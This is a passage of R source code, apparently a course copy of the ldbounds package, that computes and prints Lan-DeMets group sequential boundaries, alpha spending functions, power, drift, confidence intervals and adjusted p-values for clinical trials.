b[,1:3] <- c(z$time, z$lower.bounds, z$upper.bounds)
colnames(b) <- c("Time", "Lower", "Upper")
}
else{
b <- matrix(NA, p, 4)
b[,1:4] <- c(z$time, z$time2, z$lower.bounds, z$upper.bounds)
colnames(b) <- c("Time", "Time 2", "Lower", "Upper")
}
ans <- list()
ans$type <- z$bounds.type
ans$spending <- z$spending.type
ans$n <- p
ans$alpha <- z$alpha
ans$oalpha <- z$overall.alpha
ans$bounds <- b
rownames(ans$bounds) <- rownames(ans$bounds, do.NULL = FALSE, prefix = "")
if (ans$type%in%(1:3)){
cat("\nLan-DeMets bounds for a given spending function \n", "\nn = ", ans$n, "\nOverall alpha: ", ans$oalpha, "\n")
}
if (ans$type%in%(4:6)){
cat("\nGroup sequential boundaries \n", "\nn = ", ans$n, "\nOverall alpha: ", ans$oalpha, "\n")
}
if (ans$type%in%c(1,4)){
if (ans$type==1){
cat("\nType: One-Sided Bounds", "\nalpha: ", ans$alpha, "\nSpending function:", ans$spending, "\n", "\nBoundaries:\n")
}
if (ans$type==4){
cat("\nType: One-Sided Bounds", "\nalpha: ", ans$alpha, "\nBoundary type (non-alpha-spending):", ans$spending, "\n", "\nBoundaries:\n")
}
if (ncol(ans$bounds)==3)
print.default(ans$bounds[,-2], digits = 5, quote = FALSE, print.gap = 2, ...)
else
print.default(ans$bounds[,-3], digits = 5, quote = FALSE, print.gap = 2, ...)
cat("\n")
}
else{
if (ans$type==2){
if (length(ans$alpha)==2){
cat("\nType: Two-Sided Symmetric Bounds", "\nLower alpha: ", ans$alpha[1], "\nUpper alpha: ", ans$alpha[2], "\nSpending function: ", ans$spending, "\n")
}
else{
cat("\nType: Two-Sided Symmetric Bounds", "\nLower alpha: ", ans$alpha/2, "\nUpper alpha: ", ans$alpha/2, "\nSpending function: ", ans$spending, "\n")
}
}
if (ans$type==5){
if (length(ans$alpha)==2){
cat("\nType: Two-Sided Symmetric Bounds", "\nLower alpha: ", ans$alpha[1], "\nUpper alpha: ", ans$alpha[1], "\nBoundary type (non-alpha-spending): ", ans$spending, "\n")
}
else{
cat("\nType: Two-Sided Symmetric Bounds", "\nLower alpha: ", ans$alpha/2, "\nUpper alpha: ", ans$alpha/2, "\nBoundary type (non-alpha-spending): ", ans$spending, "\n")
}
}
if (ans$type==3){
cat("\nType: Two-Sided Asymmetric Bounds", "\nLower alpha: ", ans$alpha[1], "\nSpending function for the lower boundary: ", ans$spending[1], "\nUpper alpha: ", ans$alpha[2], "\nSpending function for the upper boundary: ", ans$spending[2], "\n")
}
if (ans$type==6){
cat("\nType: Two-Sided Asymmetric Bounds", "\nLower alpha: ", ans$alpha[1], "\nType of (non-alpha-spending) lower boundary: ", ans$spending[1], "\nUpper alpha: ", ans$alpha[2], "\nType of (non-alpha-spending) upper boundary: ", ans$spending[2], "\n")
}
cat("\nBoundaries:\n")
print.default(ans$bounds, quote = FALSE, print.gap = 2, ...)
cat("\n")
}
}
"print.drift" <-
function(x, digit = 5, ...)
{
z <- x
if (!inherits(z, "drift"))
stop("'x' must inherit from class \"drift\"")
ans <- list()
ans$type <- z$type
ans$n <- length(z$time)
if ((ans$type==1)|(ans$type==2)){
ans$power <- z$power
ans$drift <- z$drift
if (identical(z$time,z$time2)){
b <- matrix(NA, ans$n, 3)
b[,1:3] <- c(z$time, z$lower.probs, z$upper.probs)
colnames(b) <- c("Time", "Lower probs", "Upper probs")
ans$bounds1 <- b
}
else{
b <- matrix(NA, ans$n, 4)
b[,1:4] <- c(z$time, z$time2, z$lower.probs, z$upper.probs)
colnames(b) <- c("Time", "Time 2", "Lower probs", "Upper probs")
ans$bounds1 <- b
}
}
if (ans$type==3){
ans$level <- z$conf.level
ans$fzvalue <- z$final.zvalue
ans$interval <- z$conf.interval
}
if (ans$type==3){
ans$level <- z$conf.level
ans$fzvalue <- z$final.zvalue
ans$interval <- z$conf.interval
}
if (ans$type==4){
if (z$p.ordering=="SW"){
ans$p.ordering <- "Stage-wise"
}
if (z$p.ordering=="LR"){
ans$p.ordering <- "Likelihood ratio "
}
ans$fzvalue <- z$final.zvalue
ans$analysis.time <- z$analysis.time
ans$p.value <- z$p.value
}
if (identical(z$time,z$time2)){
ans$bounds <- matrix(c(z$time, z$lower.bounds, z$upper.bounds), ncol=3, dimnames = list(NULL,c("Time", "Lower", "Upper")))
}
else{
ans$bounds <- matrix(c(z$time, z$time2, z$lower.bounds, z$upper.bounds), ncol=4, dimnames = list(NULL,c("Time", "Time 2", "Lower", "Upper")))
}
rownames(ans$bounds) <- rownames(ans$bounds, do.NULL = FALSE, prefix = "")
cat("\nLan-DeMets method for group sequential boundaries \n", "\nn = ", ans$n, "\n")
cat("\nBoundaries: \n")
if ((ans$type==1)|(ans$type==2)){
rownames(ans$bounds1) <- rownames(ans$bounds1, do.NULL = FALSE, prefix = "")
print.default(cbind(ans$bounds,ans$bounds1[,-1]), quote = FALSE, print.gap = 2, ...)
cat("\nPower : ", ans$power, "\n","\nDrift: ", ans$drift, "\n\n")
}
if (ans$type==3){
low <- ans$interval$lower.limit
up <- ans$interval$upper.limit
cat("\nConfidence interval at the end of the trial: \n", "\nConfidence level: ", ans$level, "\nLast Z value: ", ans$fzvalue, "\n", 100*ans$level, "% confidence interval: (", low, ",", up, ")\n")
}
if (ans$type==4){
cat("\nAdjusted p-value: \n", "\nOrdering method: ", ans$p.ordering, "\nLook: ", ans$analysis.time, "\nZ value observed at that time: ", ans$fzvalue, "\n", "P-value: ", ans$p.value, "\n")
}
}
"print.summary.bounds" <-
function(x, digit = 5, ...)
{
z <- x
if (!inherits(z, "summary.bounds"))
stop("'x' must inherit from class \"summary.bounds\"")
rownames(z$bounds) <- rownames(z$bounds, do.NULL = FALSE, prefix = "")
if (z$type%in%(1:3)){
cat("\nLan-DeMets bounds for a given spending function \n", "\nn = ", z$n, "\nOverall alpha: ", z$oalpha, "\n")
}
if (z$type%in%(4:6)){
cat("\nGroup sequential boundaries \n", "\nn = ", z$n, "\nOverall alpha: ", z$oalpha, "\n")
}
if (z$type%in%c(1,4)){
if (z$type==1){
cat("\nType: One-Sided Bounds", "\nalpha: ", z$alpha, "\nSpending function:", z$spending, "\n", "\nBoundaries:\n")
}
if (z$type==4){
cat("\nType: One-Sided Bounds", "\nalpha: ", z$alpha, "\nBoundary type (non-alpha-spending):", z$spending, "\n", "\nBoundaries:\n")
}
if (ncol(z$bounds)==6)
print.default(z$bounds[,-2], digits = 5, quote = FALSE, print.gap = 2)
else
print.default(z$bounds[,-3], digits = 5, quote = FALSE, print.gap = 2)
}
else{
if (z$type==2){
if (length(z$alpha)==2){
cat("\nType: Two-Sided Symmetric Bounds", "\nLower alpha: ", z$alpha[1], "\nUpper alpha: ", z$alpha[1], "\nSpending function: ", z$spending, "\n")
}
else{
cat("\nType: Two-Sided Symmetric Bounds", "\nLower alpha: ", z$alpha/2, "\nUpper alpha: ", z$alpha/2, "\nSpending function: ", z$spending, "\n")
}
}
if (z$type==5){
if (length(z$alpha)==2){
cat("\nType: Two-Sided Symmetric Bounds", "\nLower alpha: ", z$alpha[1], "\nUpper alpha: ", z$alpha[1], "\nBoundary type (non-alpha-spending): ", z$spending, "\n")
}
else{
cat("\nType: Two-Sided Symmetric Bounds", "\nLower alpha: ", z$alpha/2, "\nUpper alpha: ", z$alpha/2, "\nBoundary type (non-alpha-spending): ", z$spending, "\n")
}
}
if (z$type==3){
cat("\nType: Two-Sided Asymmetric Bounds", "\nLower alpha: ", z$alpha[1], "\nSpending function for the lower boundary: ", z$spending[1], "\nUpper alpha: ", z$alpha[2], "\nSpending function for the upper boundary: ", z$spending[2], "\n")
}
if (z$type==6){
cat("\nType: Two-Sided Asymmetric Bounds", "\nLower alpha: ", z$alpha[1], "\nType of (non-alpha-spending) lower boundary: ", z$spending[1], "\nUpper alpha: ", z$alpha[2], "\nType of (non-alpha-spending) upper boundary: ", z$spending[2], "\n")
}
cat("\nBoundaries:\n")
print.default(z$bounds, digits = digit, quote = FALSE, print.gap = 2)
}
}
"print.summary.drift" <-
function(x, digit = 5, ...)
{
z <- x
if (!inherits(z, "summary.drift"))
stop("'x' must inherit from class \"summary.drift\"")
rownames(z$bounds) <- rownames(z$bounds, do.NULL = FALSE, prefix = "")
cat("\nLan-DeMets method for group sequential boundaries \n", "\nn = ", z$n, "\n")
cat("\nBoundaries: \n")
print.default(z$bounds, digits = digit, quote = FALSE, print.gap = 2)
if ((z$type==1)|(z$type==2)){
cat("\nPower : ", z$power, "\n","\nDrift: ", z$drift, "\n", "\n")
rownames(z$bounds1) <- rownames(z$bounds1, do.NULL = FALSE, prefix = "")
print.default(z$bounds1, digits = digit, quote = FALSE, print.gap = 2)
}
if (z$type==3){
low <- z$interval$lower.limit
up <- z$interval$upper.limit
cat("\nConfidence interval at the end of the trial: \n", "\nConfidence level: ", z$level, "\nLast Z value: ", z$fzvalue, "\n", 100*z$level, "% confidence interval: (", low, ",", up, ")\n")
}
if (z$type==4){
cat("\nAdjusted p-value: \n", "\nOrdering method: ", z$p.ordering, "\nLook: ", z$analysis.time, "\nZ value observed at that time: ", z$fzvalue, "\n", "P-value: ", z$p.value, "\n")
}
}
"qp" <-
function(xq,last,nints,yam1,ybm1,stdv){
hlast <- (ybm1-yam1)/nints
grid <- seq(yam1,ybm1,length=nints+1)
fun <- last*pnorm(grid,mean=xq,sd=stdv)
qp <- 0.5*hlast*(2*sum(fun)-fun[1]-fun[length(fun)]) # This is "trap"
return(qp)
}
"search.glan.obrien" <-
function(k,c,alpha){
return(glan((1:k)/k,rep(-8,k),c/sqrt((1:k)/k),0)$pr-alpha)
}
"search.glan.pocock" <-
function(k,c,alpha){
return(glan((1:k)/k,rep(-8,k),rep(c,k),0)$pr-alpha)
}
"summary.bounds" <-
function (object, digits=5, ...)
{
z <- object
if (!inherits(z, "bounds"))
stop("'object' must inherit from class \"bounds\"")
p <- length(z$time)
if (identical(z$time,z$time2)){
b <- matrix(NA, p, 6)
b[,1:6] <- c(z$time, z$lower.bounds, z$upper.bounds, z$exit.pr, z$diff.pr, z$nom.alpha)
colnames(b) <- c("Time", "Lower", "Upper", "Exit pr.", "Diff. pr.", "Nominal Alpha")
}
else{
b <- matrix(NA, p, 7)
b[,1:7] <- c(z$time, z$time2, z$lower.bounds, z$upper.bounds, z$exit.pr, z$diff.pr, z$nom.alpha)
colnames(b) <- c("Time", "Time 2", "Lower", "Upper", "Exit pr.", "Diff. pr.", "Nominal Alpha")
}
ans <- list()
ans$type <- z$bounds.type
ans$spending <- z$spending.type
ans$n <- p
ans$alpha <- z$alpha
ans$oalpha <- z$overall.alpha
ans$bounds <- b
class(ans) <- "summary.bounds"
return(ans)
}
"summary.drift" <-
function (object, ...)
{
z <- object
if (!inherits(z, "drift"))
stop("'object' must inherit from class \"drift\"")
ans <- list()
ans$type <- z$type
ans$n <- length(z$time)
if ((ans$type==1)|(ans$type==2)){
ans$power <- z$power
ans$drift <- z$drift
if (identical(z$time,z$time2)){
b <- matrix(NA, ans$n, 5)
b[,1:5] <- c(z$time, z$lower.probs, z$upper.probs, z$exit.probs, z$cum.exit)
colnames(b) <- c("Time", "Lower probs", "Upper probs", "Exit pr.", "Cum exit pr.")
ans$bounds1 <- b
}
else{
b <- matrix(NA, ans$n, 6)
b[,1:6] <- c(z$time, z$time2, z$lower.probs, z$upper.probs, z$exit.probs, z$cum.exit)
colnames(b) <- c("Time", "Time 2", "Lower probs", "Upper probs", "Exit pr.", "Cum exit pr.")
ans$bounds1 <- b
}
}
if (ans$type==3){
ans$level <- z$conf.level
ans$fzvalue <- z$final.zvalue
ans$interval <- z$conf.interval
}
if (ans$type==4){
if (z$p.ordering=="SW"){
ans$p.ordering <- "Stage-wise"
}
if (z$p.ordering=="LR"){
ans$p.ordering <- "Likelihood ratio "
}
ans$fzvalue <- z$final.zvalue
ans$analysis.time <- z$analysis.time
ans$p.value <- z$p.value
}
if (identical(z$time,z$time2)){
ans$bounds <- matrix(c(z$time, z$lower.bounds, z$upper.bounds), ncol=3, dimnames = list(NULL,c("Time", "Lower", "Upper")))
}
else{
ans$bounds <- matrix(c(z$time, z$time2, z$lower.bounds, z$upper.bounds), ncol=4, dimnames = list(NULL,c("Time", "Time 2", "Lower", "Upper")))
}
class(ans) <- "summary.drift"
return(ans)
}
## Local Variables:
## End:
| /FinalExam/ldbounds.R | no_license | snandi/Stat641_Fall2015 | R | false | false | 35,613 | r | ## Program Name: ldbounds.R##
## Package ldbounds.R (unreleased version) ##
"bounds" <-
function(x,t2=x,iuse=1,asf=NULL,alpha=0.05,phi=rep(1,length(alpha)),sides=2,ztrun=rep(8,length(alpha))){
if (!is.numeric(x)){
stop("'x' must be a vector of analysis times or the number of analysis times")
}
if (length(x)==1){
t <- (1:x)/x
if (t2==x){
t2 <- t
}
}
else{
t <- x
}
if (length(t) != length(t2)){
stop("Original and second time scales must be vectors of the same length.")
}
if ({min(t) < 0.0000001}|{max(t) > 1.0000001}|{min(t2) < 0.0000001}){
stop("Analysis times must be in (0,1]. Second time scale values must be positive.")
}
t3 <- t2
t2 <- t2/max(t2)
if ({sum({t-c(0,t[-length(t)]) < 0.0000001}) > 0}|{sum({t2-c(0,t2[-length(t)]) < 0.0000001}) > 0}){
stop("Analysis times must be ordered from smallest to largest.")
}
if ({sum(alpha < 0.0000001) > 0}|{sum(alpha) > 1.0000001}){
stop("Each component of alpha must be positive and their sum cannot exceed 1.")
}
if (length(iuse) != length(alpha)&(length(iuse) != length(asf))){
stop("For two-sided bounds, the lengths of the iuse and alpha vectors must both be 2.")
}
if (length(asf)==2){
if ({class(asf[[1]])!="function"}|{class(asf[[2]])!="function"}){
stop("Alpha spending function must be of class 'function'.")
}
alpha[1] <- asf[[1]](1)
alpha[2] <- asf[[2]](1)
}
if (length(asf)==1){
if (class(asf)!="function"){
stop("Alpha spending function must be of class 'function'.")
}
alpha <- asf(1)
}
if (sum(iuse==5)<length(asf)){
stop("Can't specify 2 spending functions unless iuse=c(5,5).")
}
if ({sum(iuse==5)>0}&{length(asf)==0}){
stop("If iuse=5, must specify spending function.")
}
if (sum({iuse==3}|{iuse==4}) > length(phi)){
stop("Phi must be specified for each boundary that uses spending function 3 or 4.")
}
if (sum({iuse==3}&{phi <= 0}) > 0){
stop("For power family (iuse=3), phi must be positive.")
}
if (sum({iuse==4}&{phi==0}) > 0){
stop("For Hwang-Shih-DeCani family (iuse=4), phi cannot be 0.")
}
if (length(phi)==1) phi <- rep(phi,2)
if (!sides%in%c(1,2)){
stop("Sides must be 1 or 2.")
}
if ({length(alpha)==1}|{{length(alpha)==2}&{alpha[1]==alpha[2]}&{iuse[1]==iuse[2]}&{length(asf)!=2}&{ztrun[1]==ztrun[2]}&{{length(phi)==1}|{phi[1]==phi[2]}}}){
if ({length(alpha)==1}&{sides==1}){
type <- 1
alph <- alpha
}
if ({length(alpha)==1}&{sides==2}){
type <- 2
alph <- alpha
}
if (length(alpha)==2){
type <- 2
alph <- 2*alpha[1]
}
ld <- landem(t,t2,sides,iuse[1],asf,alph,phi[1],ztrun[1])
ubnd <- ld$upper.bounds
lbnd <- ld$lower.bounds
epr <- ld$exit.pr
dpr <- ld$diff.pr
spend <- ld$spend
}
else{
type <- 3
ld1 <- landem(t,t2,1,iuse[1],asf[[1]],alpha[1],phi[1],ztrun[1])
ld2 <- landem(t,t2,1,iuse[2],asf[[2]],alpha[2],phi[2],ztrun[2])
lbnd <- -ld1$upper.bounds
ubnd <- ld2$upper.bounds
epr <- ld1$exit.pr+ld2$exit.pr
dpr <- ld1$diff.pr+ld2$diff.pr
spend <- c(ld1$spend,ld2$spend)
}
nom.alpha <- 1-pnorm(ubnd)+pnorm(lbnd)
ans <- list(bounds.type=type,spending.type=spend,time=t,time2=t3,alpha=alpha,overall.alpha=sum(alpha),lower.bounds=lbnd,upper.bounds=ubnd,exit.pr=epr,diff.pr=dpr,nom.alpha=nom.alpha)
class(ans) <- "bounds"
return(ans)
}
"alphas" <-
function(iuse,asf,alpha,phi,side,t){
tol <- 10^(-13)
if (iuse==1){
pe <- 2*(1-pnorm(qnorm(1-(alpha/side)/2)/sqrt(t)))
spend <- "O'Brien-Fleming"
}
else if (iuse==2){
pe <- (alpha/side)*log(1+(exp(1)-1)*t)
spend <- "Pocock"
}
else if (iuse==3){
pe <- (alpha/side)*t^phi
spend <- "Power Family: alpha * t^phi"
}
else if (iuse==4){
pe <- (alpha/side)*(1-exp(-phi*t))/(1-exp(-phi)) ### TDC - inserted "-"
spend <- "Hwang-Shih-DeCani Family"
}
else if (iuse==5){
if(missing(alpha)) alpha <- asf(1)
if(any(diff(asf(t))<=0.0000001))
stop("Alpha Spending function must an increasing function.")
if(asf(1)>1 ) stop("Alpha Spending function must be less than or equal to 1.")
spend <- "User-specified spending function"
pe <- (1/side)*asf(t)
}
else stop("Must choose 1, 2, 3, 4, or 5 as spending function.")
pe <- side*pe
pd <- pe-c(0,pe[-length(pe)])
if (sum(as.integer({pd<0.0000001*(-1)}|{pd>1.0000001})) >= 1){
warning("Spending function error")
pd <- min(1,pd)
pd <- max(0,pd)
}
for (j in 1:length(pd)){
if (pd[j] < tol){
warning("Type I error spent too small for analysis #",j,"\n",
"Zero used as approximation for ",pd[j])
pd[j] <- 0
}
}
ans <- list(pe=pe,pd=pd,spend=spend)
return(ans)
}
"drift" <-
function(t,za=NULL,zb=NULL,t2=x,pow=NULL,drft=NULL,conf=NULL,pval=NULL,pvaltime=NULL,zval=zb[length(zb)]){
if (inherits(t, "bounds")){
za <- t$lower.bounds
zb <- t$upper.bounds
t2 <- t$time2
t <- t$time
}
else {
if(length(t)==1){
if(abs(t - round(t)) < .0000001 & t > 1) t <- 1:t/t
else if(t>1) stop("t must be an integer or in (0,1]")}
if(missing(t2)) t2 <- t
else if (length(t) != length(t2)){
stop("Original and second time scales must be vectors of the same length.")
}
if ({min(t) < 0.0000001}|{max(t) > 1.0000001}|{min(t2) < 0.0000001}){
stop("Analysis times must be in (0,1]. Second time scale values must be positive.")
}
if ({min(t) <= 0}|{max(t) > 1}|{min(t2) <= 0}){
stop("Analysis times must be in (0,1]. Second time scale values must be positive.")
}}
if (sum({t-c(0,t[-length(t)]) <= 0}|{t2-c(0,t[-length(t2)]) <= 0}) > 0){
stop("Analysis times must be ordered from smallest to largest.")
}
if ({is.null(za)}&{!is.null(zb)})
za <- -zb
t3 <- t2
t2 <- t2/max(t2)
if (!is.null(pow)+!is.null(drft)+!is.null(conf)+!is.null(pval)!=1){
stop("Only one of power, drift, confidence level, or p-value ordering can be given.")
}
else if (is.null(pow)&is.null(drft)&is.null(conf)&is.null(pval)){
drft=0
}
drift1 <- NULL
if (!is.null(pow)){
if ({pow <= 0}|{pow > 1}){
stop("Power must be in (0,1].")
}
type <- 1
drift1 <- adrift(t2,za,zb,pow)
}
if (!is.null(drft)){
type <- 2
drift1 <- drft
}
if (!is.null(drift1)){
gl <- glan(t2,za,zb,drift1)
if (!is.null(drft)) pow <- gl$pr
ans <- list(type=type,time=t,time2=t3,lower.bounds=za,upper.bounds=zb,power=pow,
drift=drift1,lower.probs=gl$qneg,upper.probs=gl$qpos,
exit.probs=gl$qneg+gl$qpos,cum.exit=cumsum(gl$qneg+gl$qpos))
}
if (!is.null(conf)){
if (zval < 0){
stop("Confidence interval is only for nonnegative final Z value.")
}
conf.limit <- ci(conf,zval,t2,za,zb)
ans <- list(type=3,time=t,time2=t3,lower.bounds=za,upper.bounds=zb,
conf.level=conf,final.zvalue=zval,conf.interval=conf.limit)
}
if (!is.null(pval)){
if (zval < 0){
stop("P-value is only for nonnegative Z value.")
}
p.value <- adj.p(pval,pvaltime,zval,t2,zb)
ans <- list(type=4,time=t,time2=t3,lower.bounds=za,upper.bounds=zb,
conf.level=conf,analysis.time=pvaltime,final.zvalue=zval,p.ordering=pval,p.value=p.value)
}
class(ans) <- "drift"
return(ans)
}
"adj.p" <-
function(pval,pvaltime,zval,t,up.bound){
if (!pval%in%c("SW","LR")){
stop("Possible p-value orderings are stagewise (SW) and likelihood ratio (LR).")
}
if (is.null(pvaltime)){
stop("P-value time must correspond to one of the analysis times.")
}
if (!is.null(pvaltime)){
if (pvaltime>length(up.bound)){
stop("P-value time must correspond to one of the analysis times.")
}
}
if (pval=="SW"){
p.drift <- drift(zb=c(up.bound[1:(pvaltime-1)],zval),za=rep(-10,3),t=t[1:pvaltime],drft=0)
p.value <- summary(p.drift)$bounds1[,'Cum exit pr.'][pvaltime]
}
else{
lr.exit <- rep(0,length(up.bound))
maxval1 <- max(up.bound[1],zval)
lr1 <- drift(zb=maxval1,za=-10,t=t[1],drft=0)
lr.exit[1] <- lr1$exit[1]
for (j in 1:(length(up.bound)-1)){
maxval <- max(up.bound[j+1],zval)
lr <- drift(zb=c(up.bound[1:j],maxval),za=rep(-10,j+1),t=t[1:(j+1)],drft=0)
lr.exit[j+1] <- lr$exit[j+1]
}
p.value <- sum(lr.exit)
}
return(p.value)
}
"adrift" <-
function(t,za,zb,pow){
dr <- (zb[length(t)]+qnorm(pow))/sqrt(t[length(t)])
drft <- bisect(t,za,zb,pow,dr)
return(drft)
}
"bisect" <-
function(t,za,zb,target,drft=0,upper=FALSE){
tol <- 0.000001
dl <- 0.25
gotlo <- 0
gothi <- 0
prev <- 0
pr <- 0
while ({abs(pr-target) > tol}&{abs(drft-prev) > tol/10}){
glan.out <- glan(t,za,zb,drft)
if (upper){
pr <- sum(glan.out$qpos)
}
if (!upper){
pr <- glan.out$pr
}
if (pr > target+tol){
hi <- drft
drft <- drft-dl
gothi <- 1
}
if (pr < target-tol){
lo <- drft
drft <- drft+dl
gotlo <- 1
}
if ({gothi==1}&{gotlo==1}){
prev <- drft
drft <- (lo+hi)/2
}
}
if ({abs(drft-prev) <= tol/10}&{abs(pr-target) > tol}){
warning("Convergence problem")
}
return(drft)
}
"bsearch" <-
function(last,nints,i,pd,stdv,ya,yb){
tol <- 10^(-7)
del <- 10
uppr <- yb[i-1]
q <- qp(uppr,last,nints[i-1],ya[i-1],yb[i-1],stdv)
while (abs(q-pd) > tol){
del <- del/10
incr <- 2*as.integer(q > pd+tol)-1
j <- 1
while (j <= 50){
uppr <- uppr+incr*del
q <- qp(uppr,last,nints[i-1],ya[i-1],yb[i-1],stdv)
if ({abs(q-pd) > tol}&{j==50}){
stop("Error in search: not converging")
}
else if ({{incr==1}&{q <= pd+tol}}|{{incr==-1}&{q >= pd-tol}}){
j <- 50
}
j <- j+1
}
}
ybval <- uppr
return(ybval)
}
"ci" <-
function(conf,value,t,za,zb){
zb[length(t)] <- value
zcrit <- qnorm(1-(1-conf)/2)
limit <- (value+c(-1,1)*zcrit)/sqrt(t[length(t)])
target <- c(0,1)*conf+(1-conf)/2
lim1 <- bisect(t,za,zb,target[1],limit[1],upper=TRUE)
lim2 <- bisect(t,za,zb,target[2],limit[2],upper=TRUE)
lim <- list(lower.limit=lim1,upper.limit=lim2)
return(lim)
}
"commonbounds" <-
function(looks,t=(1:looks)/looks,t2=t,iuse="OF",alpha=0.05,sides=2){
if ({!is.null(looks)}&{!is.numeric(looks)}){
stop("'looks' must be an integer.")
}
if (sum(t==(1:length(t))/length(t))<length(t)){
warning("Time points are not equally spaced.")
}
if (length(t) != length(t2)){
stop("Original and second time scales must be vectors of the same length.")
}
if ({min(t) < 0.0000001}|{max(t) > 1.0000001}|{min(t2) < 0.0000001}){
stop("Analysis times must be in (0,1]. Second time scale values must be positive.")
}
t3 <- t2
t2 <- t2/max(t2)
if ({sum({t-c(0,t[-length(t)]) < 0.0000001}) > 0}|{sum({t2-c(0,t2[-length(t)]) < 0.0000001}) > 0}){
stop("Analysis times must be ordered from smallest to largest.")
}
if (sum(!iuse%in%c("PK","OF","HP"))>0){
stop("Boundary type (iuse) must be \"PK\" or \"OF\".")
}
if ({sum(alpha < 0.0000001) > 0}|{sum(alpha) > 1.0000001}){
stop("Each component of alpha must be positive and their sum cannot exceed 1.")
}
if (length(iuse) != length(alpha)){
stop("For two-sided bounds, the lengths of the iuse and alpha vectors must both be 2.")
}
if (!sides%in%c(1,2)){
stop("Sides must be 1 or 2.")
}
if ({length(alpha)==1}|{{length(alpha)==2}&{alpha[1]==alpha[2]}&{iuse[1]==iuse[2]}}){
if ({length(alpha)==1}&{sides==2}){
alph <- alpha/2
}
else{
alph <- alpha
}
if (iuse[1]=="PK"){
root <- uniroot(search.glan.pocock,c(1.5,2.3+0.05*looks),k=looks,alpha=alph)$root
ubnd <- rep(root,looks)
spend <- "Pocock"
}
if (iuse[1]=="OF"){
root <- uniroot(search.glan.obrien,c(1.5,2+0.05*looks),k=looks,alpha=alph)$root
ubnd <- root/sqrt((1:looks)/looks)
spend <- "O'Brien-Fleming"
}
if ({length(alpha)==1}&{sides==1}){
type <- 4
lbnd <- rep(-8,length(ubnd))
}
if ({length(alpha)==2}|{{length(alpha)==1}&{sides==2}}){
type <- 5
lbnd <- -1*ubnd
}
drift.for.probs <- drift(za=lbnd,zb=ubnd,t=t2,drft=0)
dpr <- drift.for.probs$upper.probs
epr <- cumsum(dpr)
}
else{
type <- 6
spend <- c("","")
if (iuse[1]=="PK"){
root <- uniroot(search.glan.pocock,c(1.5,2.3+0.05*looks),k=looks,alpha=alpha[1])$root
lbnd <- -1*rep(root,looks)
spend[1] <- "Pocock"
}
if (iuse[1]=="OF"){
root <- uniroot(search.glan.obrien,c(1.5,2+0.05*looks),k=looks,alpha=alpha[1])$root
lbnd <- -1*root/sqrt((1:looks)/looks)
spend[1] <- "O'Brien-Fleming"
}
if (iuse[2]=="PK"){
root <- uniroot(search.glan.pocock,c(1.5,2.3+0.05*looks),k=looks,alpha=alpha[2])$root
ubnd <- rep(root,looks)
spend[2] <- "Pocock"
}
if (iuse[2]=="OF"){
root <- uniroot(search.glan.obrien,c(1.5,2+0.05*looks),k=looks,alpha=alpha[2])$root
ubnd <- root/sqrt((1:looks)/looks)
spend[2] <- "O'Brien-Fleming"
}
drift.for.probs <- drift(za=lbnd,zb=ubnd,t=t2,drft=0)
dpr <- drift.for.probs$upper.probs+drift.for.probs$lower.probs
epr <- cumsum(dpr)
}
nom.alpha <- 1-pnorm(ubnd)+pnorm(lbnd)
ans <- list(bounds.type=type,spending.type=spend,time=t,time2=t3,alpha=alpha,overall.alpha=sum(alpha),lower.bounds=lbnd,upper.bounds=ubnd,exit.pr=epr,diff.pr=dpr,nom.alpha=nom.alpha)
class(ans) <- "bounds"
return(ans)
}
"cprob" <-
function(last,nints,ya,yb,i,stdv){
hlast <- (yb[i-1]-ya[i-1])/nints[i-1]
grid <- seq(ya[i-1],yb[i-1],length=nints[i-1]+1)
pupr <- (1-pnorm(yb[i],mean=grid,sd=stdv))*last
plow <- pnorm(ya[i],mean=grid,sd=stdv)*last
tqpos <- 0.5*hlast*(2*sum(pupr)-pupr[1]-pupr[length(pupr)]) # This is "trap"
tqneg <- 0.5*hlast*(2*sum(plow)-plow[1]-plow[length(plow)]) # This is "trap"
ans <- list(qpos=tqpos,qneg=tqneg)
return(ans)
}
"fcab" <-
function(last,nints,yam1,h,x,stdv){
f <- last*dnorm(h*c(0:nints)+yam1,mean=matrix(rep(x,nints+1),nints+1,length(x),byrow=TRUE),sd=stdv)
area <- 0.5*h*(2*colSums(f)-f[1,]-f[nrow(f),]) # This is "trap"
return(area)
}
"glan" <-
function(t,za,zb,drft){
h <- 0.05
stdv <- sqrt(t-c(0,t[-length(t)])) # These are subroutine "sd"
sdproc <- sqrt(t) # These are subroutine "sd"
yb <- zb*sdproc-drft*t
ya <- za*sdproc-drft*t
nints <- ceiling((yb-ya)/(h*stdv))
qneg1 <- pnorm(za[1],mean=drft*t[1]/stdv[1])
qpos1 <- 1-pnorm(zb[1],mean=drft*t[1]/stdv[1])
cp <- matrix(0,length(t),2)
cp[1,] <- c(qpos1,qneg1)
if (length(t) >= 2){
grid <- seq(ya[1],yb[1],length=nints[1]+1) # These are "first"
last <- dnorm(grid,mean=0,sd=stdv[1]) # These are "first"
for (i in 2:length(t)){
cpr <- cprob(last,nints,ya,yb,i,stdv[i])
cp[i,] <- c(cpr[[1]],cpr[[2]])
if (i < length(t)){
hlast <- (yb[i-1]-ya[i-1])/nints[i-1] # These are "other"
x <- seq(ya[i],yb[i],length=nints[i]+1) # These are "other"
last <- fcab(last,nints[i-1],ya[i-1],hlast,x,stdv[i]) # These are "other"
}
}
}
pr <- sum(cp)
ans <- list(pr=pr,qpos=cp[,1],qneg=cp[,2])
return(ans)
}
"landem" <-
function(t,t2,side,iuse,asf,alpha,phi,ztrun){
h <- 0.05
zninf <- -8
tol <- 0.0000001
stdv <- sqrt(t2-c(0,t2[-length(t2)])) # These are subroutine "sd"
sdproc <- sqrt(t2) # These are subroutine "sd"
alph <- alphas(iuse,asf,alpha,phi,side,t)
za <- zb <- ya <- yb <- nints <- rep(0,length(t))
pd <- alph$pd
pe <- alph$pe
if (pd[1]==0){
zb[1] <- -zninf
if (zb[1] > ztrun){
zb[1] <- ztrun
pd[1] <- side*(1-pnorm(zb[1]))
pe[1] <- pd[1]
if (length(t) > 1) pd[2] <- pe[2]-pe[1]
}
yb[1] <- zb[1]*stdv[1]
}
else if (pd[1] < 1){
zb[1] <- qnorm(1-pd[1]/side)
if (zb[1] > ztrun){
zb[1] <- ztrun
pd[1] <- side*(1-pnorm(zb[1]))
pe[1] <- pd[1]
if (length(t) > 1) pd[2] <- pe[2]-pe[1]
}
yb[1] <- zb[1]*stdv[1]
}
if (side==1){
za[1] <- zninf
ya[1] <- za[1]*stdv[1]
}
else if (side != 1){
za[1] <- -zb[1]
ya[1] <- -yb[1]
}
nints[1] <- ceiling((yb[1]-ya[1])/(h*stdv[1]))
if (length(t) >= 2){
grid <- seq(ya[1],yb[1],length=nints[1]+1) # These are "first"
